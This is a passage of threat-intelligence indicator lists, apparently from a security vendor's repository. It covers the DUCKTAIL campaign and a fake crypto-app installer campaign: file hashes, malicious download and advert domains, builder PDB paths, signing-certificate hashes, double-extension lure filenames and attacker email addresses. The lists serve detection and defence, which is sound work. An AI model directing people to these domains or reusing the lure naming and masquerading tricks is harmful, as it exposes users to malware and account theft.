153 | SHA1,f71a12448d8658e10e7cdfe2257da584c6d0e8a4,CustomAction - CustomAction1.dll
154 | SHA1,63a0f4aa9ce2e7eb1e72c746af9ba4407105e213,CustomAction - CustomAction1.dll
155 | SHA1,993d3f5b958bfbb7515d2254998909495797579f,CustomAction - CustomAction1.dll
156 | SHA1,f3f8b3eb0cec0ecc3cc28a8e053c50cd955f155f,CustomAction - CustomAction1.dll
157 | SHA1,c0ee0d9299c40735ec6abb96e9fa5ea4597b47cc,CustomAction - CustomAction1.dll
158 | SHA1,e99261d878ce94f835286ef3041b31f1b5f7c3f6,CustomAction - CustomAction1.dll
159 | SHA1,de533dc9eae0b8d4318cbe9fe012e5324aa3b173,CustomAction - CustomAction1.dll
160 | SHA1,0bf90d452522da04302b426aad39d8d2e1345f8e,CustomAction - CustomAction1.dll
161 | SHA1,88b31481b4cc34f351343ab239bba208d5a59a8f,CustomAction - CustomAction1.dll
162 | SHA1,29fe4121cec3d92c63e41a26edcd32b4c81667de,CustomAction - CustomAction1.dll
163 | SHA1,7d1b332eeb9aa098bd8cfb6930584472bf477410,CustomAction - CustomAction1.dll
164 | SHA1,3302fc9af4414aa3748450fc410d1273f0a99050,CustomAction - CustomAction1.dll
165 | SHA1,f832a64d20644d3eea18d210a165737e12f0aedc,Example uninstall script served by loader script
166 | SHA1,1cc823cf5fb340246227438b4f9013bcc961055d,Example payload delivery script served by loader script
167 | SHA1,5bafc80c8ce50e5103d4383554e44c74c2a2e56d,Example loader script
168 | Domain name,tujalog-online.com,Example of domain likely used in adverts through Google Display Network
169 | Domain name,thinkscopeanalytics.com,Example of domain likely used in adverts through Google Display Network
170 | Domain name,ru-consultant.com,Example of domain likely used in adverts through Google Display Network
171 | Domain name,quantifyedge-online.com,Example of domain likely used in adverts through Google Display Network
172 | Domain name,primebusinessinsights.com,Example of domain likely used in adverts through Google Display Network
173 | Domain name,phidata-analytics.com,Example of domain likely used in adverts through Google Display Network
174 | Domain name,pearlprofits.com,Example of domain likely used in adverts through Google Display Network
175 | Domain name,money-markets-ph.com,Example of domain likely used in adverts through Google Display Network
176 | Domain name,mindcraftph.com,Example of domain likely used in adverts through Google Display Network
177 | Domain name,menturaxph.com,Example of domain likely used in adverts through Google Display Network
178 | Domain name,marketview-new.com,Example of domain likely used in adverts through Google Display Network
179 | Domain name,market-pulseph-new.com,Example of domain likely used in adverts through Google Display Network
180 | Domain name,manilamoney.com,Example of domain likely used in adverts through Google Display Network
181 | Domain name,investnam-online.com,Example of domain likely used in adverts through Google Display Network
182 | Domain name,insightforge-online.com,Example of domain likely used in adverts through Google Display Network
183 | Domain name,dylloraacanorvn.com,Example of domain likely used in adverts through Google Display Network
184 | Domain name,domineomercado-new.com,Example of domain likely used in adverts through Google Display Network
185 | Domain name,datavistaonline.com,Example of domain likely used in adverts through Google Display Network
186 | Domain name,dashlytic-new.com,Example of domain likely used in adverts through Google Display Network
187 | Domain name,clarityops-new.com,Example of domain likely used in adverts through Google Display Network
188 | Domain name,corelyticsstrategicmetricsgroup.com,Example of domain likely used in adverts through Google Display Network
189 | Domain name,capitasium.com,Example of domain likely used in adverts through Google Display Network
190 | Domain name,capital-mindonline.com,Example of domain likely used in adverts through Google Display Network
191 | Domain name,bizintellabs.com,Example of domain likely used in adverts through Google Display Network
192 | Domain name,finversity-online.com,Example of domain likely used in adverts through Google Display Network
193 | Domain name,vietmetrics.com,Example of domain likely used in adverts through Google Display Network
194 | Domain name,claveinversor.com,Example of domain likely used in adverts through Google Display Network
195 | Domain name,olhareconomico-online.com,Example of domain likely used in adverts through Google Display Network
196 | Domain name,quantlens-ml.com,Example of domain likely used in adverts through Google Display Network
197 | Domain name,talentgenvn.com,Example of domain likely used in adverts through Google Display Network
198 | Domain name,teachariscorevn.com,Example of domain likely used in adverts through Google Display Network
199 | Domain name,ventures-sphere.com,Example of domain likely used in adverts through Google Display Network
200 | SHA1,878f52ee786cc341839c15cf64210f603248fa5e,Example of build.zip containing main payload
201 | SHA1,9f3e8556862ccca49609299bab2623289cdc2d01,Example of build.zip containing main payload
202 | SHA1,3b2712d83358f08dcb32af8a44a84446a81f2dc4,Example of build.zip containing main payload
203 | SHA1,2e0c10bdc60b8f1221d5b7dbdfd22446c4ad29e4,Example of build.zip containing main payload
204 | SHA1,e0117f34e53a8ff5fce259796d8d798685aa332c,Example of build.zip containing main payload
205 | SHA1,97e05ac155c46c06ea2082d67ea9c2ffb45ae2c0,Example of build.zip containing main payload
206 | SHA1,610df7f1519dbf7c16674cb681c91684f89cc4dd,Example of build.zip containing main payload
207 | SHA1,ce33ef32a9e0a6f11f84a5437bed183d8ea6fda4,Example of build.zip containing main payload
208 | SHA1,0bda793ba9126445ca94ed10349875a7c3f6d805,Example of build.zip containing main payload
209 | SHA1,7615020a6eb2d568f29f48b3d41f9febb66d1b51,Example of build.zip containing main payload
210 | SHA1,91ebddd2af48564758cc7dae94cfc592100235ca,Example of build.zip containing main payload
211 | SHA1,07fefe1d3413cc0309840d5a313d82b6c4f98968,Example of build.zip containing main payload
212 | SHA1,6fe2fe0a5ee8e761fe78136f2a4752beb0d7fcbf,CustomAction - TaskScheduler.dll
213 | SHA1,a6a598191e18135bfba804266bd239ac2d8c8c65,CustomAction - TaskScheduler.dll
214 | SHA1,9022b4a13965ae4a5a8b5f81ce328d4aea4057e5,CustomAction - TaskScheduler.dll
215 | SHA1,1c65b1a4276adc01b1d113ff485f42d7dc329b41,CustomAction - TaskScheduler.dll
216 | SHA1,a0b93f5425e11025cf81a7a6bd3621147f4e5347,CustomAction - TaskScheduler.dll
217 | SHA1,4897d9dd653f5892f6db4eeb93ec7a436c529132,CustomAction - TaskScheduler.dll
218 | SHA1,94b4b272aa233d5400918d647e6fcbfe77a6cfee,CustomAction - WMI.dll
219 | SHA1,b0af0e2009e805a14680bea7dd49ae2c0f2499c1,CustomAction - WMI.dll
220 | SHA1,ad8ef76ccd5b89670c18e0bb35b4d9e2c7b4701d,CustomAction - WMI.dll
221 | SHA1,36348461d8ec97cf802ba01779da96aef564293c,CustomAction - WMI.dll
222 | SHA1,c4305258fa22ba71d253e49584a0f1fdf4525f57,CustomAction - WMI.dll
223 | SHA1,e80f876153fb2759002c796d8813494815ff741f,CustomAction - WMI.dll
224 | Domain name,binancedesktop.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
225 | Domain name,binancesoftware.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
226 | Domain name,telegramsoftwarepc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
227 | Domain name,mine-p.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
228 | Domain name,metamasksoftware.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
229 | Domain name,binancesoftwareapps.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
230 | Domain name,binanceappsoftware.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
231 | Domain name,bitgetpc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
232 | Domain name,app-downloads-desktops.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
233 | Domain name,desktops-downloads-app.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
234 | Domain name,pc-downloads-desktop.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
235 | Domain name,desktop-app-download.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
236 | Domain name,desktop-downloads.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
237 | Domain name,tradingviewdesktopapp.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
238 | Domain name,binancewindows.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
239 | Domain name,remitanopc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
240 | Domain name,metamaskpc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
241 | Domain name,binancewindowsapp.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
242 | Domain name,binancedownloadapps.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
243 | Domain name,binancesoftwareapp.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
244 | Domain name,tradingviewpc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
245 | Domain name,bitkubapp.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
246 | Domain name,binancepcapp.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
247 | Domain name,binance-ph.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
248 | Domain name,coinspc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
249 | Domain name,binancedownload.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
250 | Domain name,tradingviewdownload.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
251 | Domain name,binancepcapps.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
252 | Domain name,bitkubpc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
253 | Domain name,binanceapps.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
254 | Domain name,okxdownloadpc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
255 | Domain name,binancepcdownload.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
256 | Domain name,binanceappdownload.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
257 | Domain name,bybitpc.app,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
258 | Domain name,lmear.pages.dev,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
259 | Domain name,downloads-app-pc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
260 | Domain name,desktop-apps.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
261 | Domain name,tttery.pages.dev,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
262 | Domain name,jhjggg.pages.dev,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
263 | Domain name,uuiewer.pages.dev,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
264 | Domain name,app-pc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
265 | Domain name,downloads-apps.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
266 | Domain name,bobik15.pages.dev,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
267 | Domain name,pc-apps-download.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
268 | Domain name,pc-app-download.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
269 | Domain name,llaser.pages.dev,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
270 | Domain name,binance.rewards-pc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
271 | Domain name,binanceapp-pc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
272 | Domain name,desktopreward.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
273 | Domain name,rewarddesktop.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
274 | Domain name,app-pc-download.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
275 | Domain name,asiop.pages.dev,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
276 | Domain name,app-windows.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
277 | Domain name,app-desktop.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
278 | Domain name,kkkerrr.pages.dev,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
279 | Domain name,blissfuulhaven.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
280 | Domain name,apps-desktop.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
281 | Domain name,bybit-pc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
282 | Domain name,download-apps-pc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
283 | Domain name,restless-bush-aec3.wkegibkjntqejdk.workers.dev,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
284 | Domain name,sdgerhg.pages.dev,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
285 | Domain name,rewards-pc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
286 | Domain name,apps-pc-downloads.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
287 | Domain name,pc-apps-downloads.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
288 | Domain name,app-pc-downloads.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
289 | Domain name,pc-desktops-apps.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
290 | Domain name,app-desktops-pc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
291 | Domain name,desktops-downloads-pc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
292 | Domain name,download-pc-desktops.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
293 | Domain name,pc-app-desktops.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
294 | Domain name,download-desktops-pc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
295 | Domain name,desktops-download-app.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
296 | Domain name,pc-download-desktops.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
297 | Domain name,download-desktops-app.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
298 | Domain name,bullvpn.io,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
299 | Domain name,bullvpn.net,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
300 | Domain name,bybitdesktop.app,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
301 | Domain name,bybitdesktop.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
302 | Domain name,bybitdesktop.net,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
303 | Domain name,bybitdesktop.org,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
304 | Domain name,bybitpc.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
305 | Domain name,desktop-reward.com,"Domain used as part of initial delivery, e.g. masqeuraded download site, backend site, or redirection"
306 | 


--------------------------------------------------------------------------------
/DUCKTAIL/iocs.csv:
--------------------------------------------------------------------------------
   1 | Indicator type,Data
   2 | domain,ductai.xyz
   3 | domain,ductai90.com
   4 | pdb,C:\Users\DucTai\source\repos\VrProject\App4\obj\Release\App4.pdb
   5 | pdb,E:\Projects\VirutTest\DataExtractor\obj\Release\net5.0\win-x86\linked\DataExtractor.pdb
   6 | pdb,H:\Projects\VirutTest\DataExtractor\obj\Release\net5.0\win-x86\DataExtractor.pdb
   7 | pdb,D: \Projects\virot\DataExtractor\obj\Release\net5.0\win-x86\DataExtractor.pdb
   8 | pdb,H:\Projects\VirutTest\GraphData\bin\Debug\net7.0\win-x64\native\GraphData.pdb
   9 | pdb,H:\Projects\VirutTest\GraphData\bin\Debug\net7.0\win-x64\native\Reader.pdb
  10 | pdb,H:\Projects\VirutTest\WIndowsData\obj\Release\netcoreapp3.1\win-x86\WIndowsData.pdb
  11 | pdb,G:\Projects\virot\DataExtractor\obj\Debug\netcoreapp3.0\win-x86\ZEncryptReader.pdb
  12 | cert_sha1,92a7ac122ab87ccfd19224b2be89fd7bbee6d0b1
  13 | cert_sha1,c8d5b988464e7e49b932a01d3b75e192fc7a0026
  14 | cert_sha1,27ac50a5f2751429eed99fd4abff73c2129ba387
  15 | cert_sha1,2e1b5903131ad42591021919ac27beecd70c9253
  16 | cert_sha1,ce5f839cb8a3473330256ed72c144f689ad3c55d
  17 | cert_sha1,b14deb48c60771fb05cddf6a16ea9fc4e56ac6be
  18 | cert_sha1,1b07ce1f47ba6b19087499fa4ba2e93beac227c4
  19 | filename,armani brand fashion- brand develop-united arab emirates.exe
  20 | filename,details of project marketing plan and facebook google ads results report.exe
  21 | filename,facebook advertising information gđ 40.exe
  22 | filename,Facebook advertising information GD44.exe
  23 | filename,file description of project air conditioner gadee.exe
  24 | filename,information about the website and project of the company's high-end massage chair mod .pdf.exe
  25 | filename,new project armani brand fashion- brand develop-india and singafore.exe
  26 | filename,new project armani brand fashion- brand develop-india.exe
  27 | filename,new project cityscape mena brand real estate (2).exe
  28 | filename,new project l'oréal budget business plan.exe
  29 | filename,new project missoni brand- brand develop-project information-062022.exe
  30 | filename,new project xiaomi brand- brand develop-india.exe
  31 | filename,product information massage chair on facebook platform marketing pphongg.exe
  32 | filename,products information led desk lamp on facebook pphongg.exe
  33 | filename,products information massage chair on facebook pphongg.exe
  34 | filename,"project development plan, project information, products.pdf.exe"
  35 | file_sha256,740fd780b2b45c08d1abb45cddc6d1017c9fcc6bcce54fd8415d87a80d328ff6
  36 | file_sha256,d93c40de3e43ec58b115e5590c98ef62de15df9b706ef6d4a06d022fa874bb48
  37 | file_sha256,aaf44bce6a5a2ab5b7f3f75f8238d6abe46f9fd2f2e2a2b2672ba6e52f4d5754
  38 | file_sha256,4f43c031ff415fcb2f6865e98e91eaf611eb6a576acfe3250b57dc5e47a7d34f
  39 | file_sha256,f433fc47b9ccd66aa80196e04a4e4bf54fe3d1c689e4b5d5bcdf86017c3f8abe
  40 | file_sha256,a5026e7a88c3b833ee3678944d003fdfe51f86d44515c470dd2c8aa62e0fd0d2
  41 | file_sha256,4759cb5a37f2c8661c3817206b4d34d65825d80526ce41461f6c11ea56289ff3
  42 | file_sha256,4c546c259cbbf0daf1d0aa00d3385a1ea9e74b6fb2e3692ef44e1da27ba30abc
  43 | file_sha256,71a89855974dcd69f3547632368f2ce8cfa490ee96b514d832f04cc22923f143
  44 | file_sha256,a6decb34e5688f543e541dbc79e6884ace29c93d7fc43716eb32204cb3c0003e
  45 | file_sha256,59caef212349c6423e1fc581aaf76ab735269990bb7dc8e193e2877957c71e91
  46 | file_sha256,1000d705806b940af52b54cba98261b64ed658a355e0922d64551c5acb7f1a40
  47 | file_sha256,47f9122f0a25f4909795ede9bb4458495ae70fa2657745ec7c47ee172e040209
  48 | file_sha256,52e295073d2114c0683d95c8d323bddc95baa5c68f8362ebcc81124a06e42672
  49 | file_sha256,6e797da70db98e1f8fb5a7cf794b8a8e90549e8915f4d04f510690ae23aeb505
  50 | file_sha256,25b427a06608ebfc48c778829427a732c17986c64345acf35e92d03ccb126b8f
  51 | file_sha256,d3633c2372b67db37b11de741bfa676a425322c5208b8396c62983aed88d2bcc
  52 | file_sha256,600a498e55512723074b6f5a952ffd38b249c30117e9eaafcccda4fd1a0c1e75
  53 | file_sha256,e74f131d1e5ed725383ee5b89ec1216c642fbd77928dafd991b406a7f59251b6
  54 | file_sha256,469bcbd18e2b5d4ca15f449d43c13656758503fcc4042a05721ef5f3c35345e2
  55 | file_sha256,dec248f011c1f945f590bb5aeefbbcb41bdaa6c665625a594f8b315f014ea4bb
  56 | file_sha256,e8d5af5ebff12d0cbb8b1cd70f149a8234b993facc32b3808fc7db94f2bf80a9
  57 | file_sha256,7952eb4832bfe5155e2f37abb68d552ed8f2f426715f2bc65eae5a69f1f28d87
  58 | file_sha256,7c6b1a349ad96d8368e1f9742992f764a7de32e9c078709372210a88a721c532
  59 | file_sha256,7eb994eaa7be9dcfb37bdfd7c8bec1dc8b90e3ec4aa86de6e6125c97eeb64426
  60 | file_sha256,af75e8c1f3229868d41b141165714c56baf38f3f49c8c014c4fa18bc934720bf
  61 | file_sha256,6688e027e837f8e86dbbe40e2e663e72a1b7e977ae25d1157ecd8793d947f0c7
  62 | file_sha256,7d15d3cdc41cc0c3452a538ed3bf8e0dbc9a0cbd4bbca453a293287e240dfff8
  63 | file_sha256,b83059cc733ad4af37a15a24222b09be3ee02af3964bc62ae5de6354cd85f65b
  64 | file_sha256,61953e2d6e80fca18173bd3ce695274c5a25db449ac32addd8ee5b0ac29efa02
  65 | file_sha256,f17d2acb4c1bd0332b3c0cdba83001b82fd96d62d5bf829ae1e409902195b038
  66 | file_sha256,1092ab1743ca59c29bee69d73918ee78e2195fafa232a16ba790429d39dc9083
  67 | file_sha256,1e6ff886f386afbbcf8dc175bd1fbdfd8079448f1cb5a546352d7065c5fa5e7b
  68 | file_sha256,a81cbb9871f692350bf21d07b9acc233268df233b79c311a482d9783eb9bd539
  69 | file_sha256,d7f4372daf2729c956ce63e0ba2b7149f1bae03da7fbae486bbcfb0bda0f8d70
  70 | file_sha256,3f9300d5d84482010bce08e9cc7b0a5b605086dc4143e8470e9e23ef14f0c27f
  71 | file_sha256,e2a343dfa801882625c264f944f89665319ea9b3a2793ec47a02bb4a126f5e15
  72 | file_sha256,8cf5a4d0b6848604c338ad2d8bde8ceab2e86fff0d65e777bc574025f26bad73
  73 | file_sha256,994039645f60d5fc9621cb10826b7583c83667827c195b3fa9d875a8ee50b170
  74 | file_sha256,c9c5409e6327f2f443dfa3cb6ffa527b291a34a572c14e93b65205fd305f4ff1
  75 | file_sha256,83126452e240cdebbfaabeda58dcb4ea68f1e9836596e6032119592b4057ca4e
  76 | file_sha256,7395aa619010fee65ef640f46023be5732188df36079e13f023aa2dc69602e21
  77 | file_sha256,a09f560a1ddbc7c60695d5651cff0ae0f0911399cb5146bb531caccb4d14089e
  78 | file_sha256,34392151e58955b0bd7eb70a90499127ec5810a8488c2ae5bd4da1f9167a7762
  79 | file_sha256,9d24436f652abe1df6319fbfa0a5468f1061e280d41fb00a60265d6c2aa7871d
  80 | file_sha256,8c87c2d7f3932fa6661daf8fbf058ab4b721d0d6fe0849da30ae695b61d3ddc2
  81 | file_sha256,f47a002d93df2190e47e7026663bea34ea0299a4afe2810b8cb45b51bf330a8b
  82 | file_sha256,6578a3dfaa2c59443b02581c0097e8c356babcb388c4ab48ef651c90c262e9e7
  83 | file_sha256,4a56e4a753a5fa615aec4f80eb842ea2f089bd439e93ecf406f8433e97b659e8
  84 | file_sha256,a8196b3995bfbc62ec073dd35377a5412db30e9070ab72743694cceaddd2495c
  85 | file_sha256,958ff188086e33caf119347ef7d81a99716e83bc688ed1ada1ad25feab7088b9
  86 | file_sha256,697307235b627a33f4308a14dda9c1f33e38c9efb572026320bca453f6301b0a
  87 | file_sha256,b0968ac6489e7f2122ef2deafbc5a5f5968451918a8023c7aa8ded7171264ba4
  88 | file_sha256,625b5b3f5bc9e1fce5486812051b187975210a46bc2d9a712e9ef9ae5c68f09c
  89 | file_sha256,d6c18d9efcbb6ce7292c4d6bdba70a64acca10561b66fd88e9e47cb9c7b63392
  90 | file_sha256,4089277eff9f088684f53697c2f5615dcf4c940c1693d9d8c85a7de47dce7161
  91 | file_sha256,ce1f6a00bf9f79ffe879c2e7ef40166ecacbe6a17a382544648f0f25c5c4177b
  92 | file_sha256,2c9824d0faff9a0485c36546ac7884697d1773bd221c2586ae9ddb0e54208731
  93 | file_sha256,a99fa349faabd5773816c53a11b67a7be95f277b622ebe93c1ca3625500b8384
  94 | file_sha256,1fcbf708854f7ebf93726d5dd08c08648e84aee0a33a618a29c7e50df09e12d5
  95 | file_sha256,cd8b9cc35064b76df01ba5ce7536fd8b60dc773e32889ceca95f586112b6f3c5
  96 | file_sha256,044eba497f9259d18a3ea593de3fc39c6123805ce485cf4a193083f9e0b74bb7
  97 | file_sha256,e81db61004834afb0dbf47db128942e3353774764466fb9269e88a553e6dfc33
  98 | file_sha256,ee5dcf9b070e19b87842e5c9ce3548bb1507e41d7aad272ae697afcd9f3ab7c2
  99 | file_sha256,7af6cbfd7d1e7fe2f8c8c0382ee43860ec2cbe25ca845588981263ff8144f236
 100 | file_sha256,a30548fa4058d1309d4d75dd2dc36a492c503168f4d1c2f6c52cce57069629cc
 101 | file_sha256,fc8c250c2346e5440e249942eb8fe7c8b9b7d8d013f275c5fae2ae142ac50171
 102 | file_sha256,8db1a51d514811057d29ddda85858f52303999cebdeae25f88d05a39594afd3a
 103 | file_sha256,f7c015d65d4966936927ae5241ead77c9d167d749e97667a571d7439e652ffa3
 104 | file_sha256,a3c5cd4f1afbe10de154bf3f669479496ff2e93da660a849ff41c29d5f118a4a
 105 | file_sha256,9ef977e0403f9dff5cebe3935402d7a776ca3c9a79618e4d6992d3754051f603
 106 | file_sha256,d6c7c6a9098769b015802a278eb81bc7b72b08c5e18534ac71f01394a95c1f28
 107 | file_sha256,647793166e03397bb1c30f0935330bcabc9f2f0f4ba8d7a821fc145237d96b2f
 108 | file_sha256,ddb7c9d4da1bc5534cda685bf3ac3e6ee56dd8605504da1e6c7a1fda5fd24ee2
 109 | file_sha256,300358895c7895c14949c80d7b4ef6fa50ec5027e65e4578d503c39f2bd6618e
 110 | file_sha256,e4bf8cfc1035f51020ff033b9366dd1fefef8ae5664e2fde6798831399c51d1d
 111 | file_sha256,c1e65ebb05c500b5ade389a2f880e9116b74b24782d9ea13955adab087194b43
 112 | file_sha256,4874878056cebe9627bbf44a3bc977315d6e14492af855319103b99103241c5f
 113 | file_sha256,d26b0baa30cc13df88eca57ce22f651a744cf5683b8b62121b4292e1005527f7
 114 | file_sha256,d5939fc12c88264cb28ac867767e5492aa145f0499aeaaa83cdaca8b15da07ee
 115 | file_sha256,507376fa684f17508a195426d933e0e2ef92028d5956ed66cba825b6ce61df8e
 116 | file_sha256,c2c7347339cbb5975205df81cfa89e8c23c59f97e56a81fbd2c178a78def23df
 117 | file_sha256,a8850c0de9c2ff0ad440eeb299013de88940de8ad7f4076fd05ee63087d08fe8
 118 | file_sha256,e5a2d62ab4f8dcce7c5376378ec16bbcb5620f5ea507e74b0ac32649a2b9e52b
 119 | file_sha256,0dcf3b1c16f39e375e53b2b63de1f267334a075e84aad857b3ce52dcaee73ab2
 120 | file_sha256,012ec7a1553f46fd3fe28f175a3205c85f672153a6793a81cc8f6ad65085cc0c
 121 | file_sha256,267874d5e9ccb484994fc20d08f8c653986e056c12cfc8e1ce7565dd6b60f5a7
 122 | file_sha256,3ece0a9a92a410b8edad39bbb2aad3c155ae7f8b2a0177e116efbe29292329a9
 123 | file_sha256,05aeb980d9eb1597bfde77b6969bdc7d13ff8a5f95db4112c5330f442c01f6f0
 124 | file_sha256,51abe6d7196e93c4264ff508a11611b871bb1c9d96df2086efe84dd48af96cc2
 125 | file_sha256,05aeb980d9eb1597bfde77b6969bdc7d13ff8a5f95db4112c5330f442c01f6f0
 126 | file_sha256,e5a2d62ab4f8dcce7c5376378ec16bbcb5620f5ea507e74b0ac32649a2b9e52b
 127 | file_sha256,c2c7347339cbb5975205df81cfa89e8c23c59f97e56a81fbd2c178a78def23df
 128 | file_sha256,267874d5e9ccb484994fc20d08f8c653986e056c12cfc8e1ce7565dd6b60f5a7
 129 | file_sha256,3ece0a9a92a410b8edad39bbb2aad3c155ae7f8b2a0177e116efbe29292329a9
 130 | file_sha256,07d5d4721c3ed9a860dc10d25f226dd81a83602023c63310f9634b8dd704e7f8
 131 | file_sha256,0dcf3b1c16f39e375e53b2b63de1f267334a075e84aad857b3ce52dcaee73ab2
 132 | file_sha256,012ec7a1553f46fd3fe28f175a3205c85f672153a6793a81cc8f6ad65085cc0c
 133 | file_sha256,161d081e9ba94ee1749c3192888702f6a25e8e2fb59b9d1f9d989ffc885566a6
 134 | file_sha256,80160fd48ba4d174ccd1d2d8e72afc3674c1ce7c73ef18d3e372a6d68e6b3227
 135 | file_sha256,a8850c0de9c2ff0ad440eeb299013de88940de8ad7f4076fd05ee63087d08fe8
 136 | file_sha256,8731ec7667084e649622e9f553e291b889eb0709c669545bd19f3ec0c2878687
 137 | file_sha256,de0a568803eb5b3d51eac593d2c9174e6fdef9a9ee11f222e5822ae3f182b5b0
 138 | file_sha256,a979cf0a2a44f2c23e01eb72cb72cbfadbae40bea38a3d390977d79bad610bc8
 139 | file_sha256,40da0bc61a4ccf170f43981a7d908b0c3b541b1652cbb959b1ea9a87dd5944a7
 140 | file_sha256,d76260578caf24dbb6dd2d10c60b066d7659f5c21da8c998f34ab0f675d626d2
 141 | file_sha256,5d9b287df9b9b3f019e8d5834f117200f0651ecd0988338fb395ef1382fabc26
 142 | file_sha256,cd5c66a206e92be1e7eb77d5cb69c63fc2acc9ffbfcf7031713c9fddca11b3e7
 143 | file_sha256,f4e9feb547dcd6a233f71c7ad57a0759a584ae94a9e822a64831ed26cb32ecf4
 144 | file_sha256,0241555cc3e21a658c78cbe93ab75eaa4f978a013df22852ada57652a3a57b6a
 145 | file_sha256,cc5483d21c84ac73c410194205b529d6190b322b8da49577ee36ae9d8878c0c3
 146 | email_address,andeakefer@gmail.com
 147 | email_address,thutvbj@gmail.com
 148 | email_address,enecildne@gmail.com
 149 | email_address,saingghuy@gmail.com
 150 | email_address,worstaustadny@gmail.com
 151 | email_address,bangthangsfatr@gmail.com
 152 | email_address,larmincessdf@gmail.com
